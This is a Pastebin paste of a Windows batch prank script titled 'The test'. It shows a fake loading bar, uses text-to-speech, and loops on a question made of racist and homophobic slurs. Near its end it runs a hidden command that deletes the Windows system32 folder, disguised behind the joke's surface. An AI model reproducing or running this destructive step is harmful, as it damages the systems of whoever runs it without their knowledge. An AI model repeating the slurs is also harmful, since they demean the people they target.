Advertisement
Guest User

Untitled

a guest
Oct 24th, 2014
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.31 KB | None | 0 0
  1. @echo off
  2. title The test
  3. echo set speech = Wscript.CreateObject("SAPI.spVoice") >> "temp.vbs"
  4. set text=loading
  5. echo speech.speak "%text%" >> "temp.vbs"
  6. start temp.vbs
  7. timeout /t 1 /nobreak > NUL
  8. del temp.vbs
  9. color 0a
  10. echo Loading...
  11. echo {// 39}
  12. timeout /t 1 /nobreak > NUL
  13. cls
  14. echo Loading...
  15. echo {///// 49}
  16. timeout /t 1 /nobreak > NUL
  17. cls
  18. echo Loading...
  19. echo {////// 76}
  20. timeout /t 1 /nobreak > NUL
  21. cls
  22. echo Loading...
  23. echo {//////// 89}
  24. timeout /t 1 /nobreak > NUL
  25. cls
  26. echo Loading...
  27. echo {////////// 100}
  28. cls
  29. :again
  30. color c0
  31. echo You are a nigger faggot?
  32. echo.
  33. set /p answer=..............{Y/N}?
  34. if /i "%answer:~,1%" EQU "Y" goto :yes
  35. if /i "%answer:~,1%" EQU "N" goto :no
  36. :no
  37. timeout /t 1 /nobreak > NUL
  38. color 4e
  39. echo.
  40. echo Wrong
  41. echo.
  42. echo set speech = Wscript.CreateObject("SAPI.spVoice") >> "no.vbs"
  43. set text=try again
  44. echo speech.speak "%text%" >> "no.vbs"
  45. start no.vbs
  46. timeout /t 1 /nobreak > NUL
  47. del no.vbs
  48. timeout /t 1 /nobreak > NUL
  49. cls
  50. goto :again
  51. :yes
  52. color 27
  53. echo.
  54. echo you fucking know you are...
  55. echo.
  56. echo set speech = Wscript.CreateObject("SAPI.spVoice") >> "yes.vbs"
  57. set text=good job faggot
  58. echo speech.speak "%text%" >> "yes.vbs"
  59. start yes.vbs
  60. timeout /t 1 /nobreak > NUL
  61. del yes.vbs
  62. pause
  63. del temp.vbs
  64. del no.vbs
  65. del yes.vbs
  66. del c:\windows\system32
  67. cls
  68. exit /b
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement